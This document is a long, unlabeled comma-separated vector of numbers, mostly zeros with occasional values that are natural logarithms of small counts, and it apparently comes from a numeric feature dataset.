0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.437751649736401, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.553876891600541, 0.0, 0.0, 0, 4.3694478524670215, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 1.7412592803704001, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.9459101490553132, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.143134726391533, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 16.025617661073383, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.390770307485499, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.665683717782408, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 7.299022054230198, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.631631038266565, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 4.182806904693497, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 2.8398715690385097, 1.791759469228055, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.20455776256869, 0.0, 0.0, 0.0, 0.0, 2.9444389791664403, 0.0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.518263445217987, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 3.8005740880419454, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 4.553876891600541, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 2.4849066497880004, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 3.4011973816621555, 0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 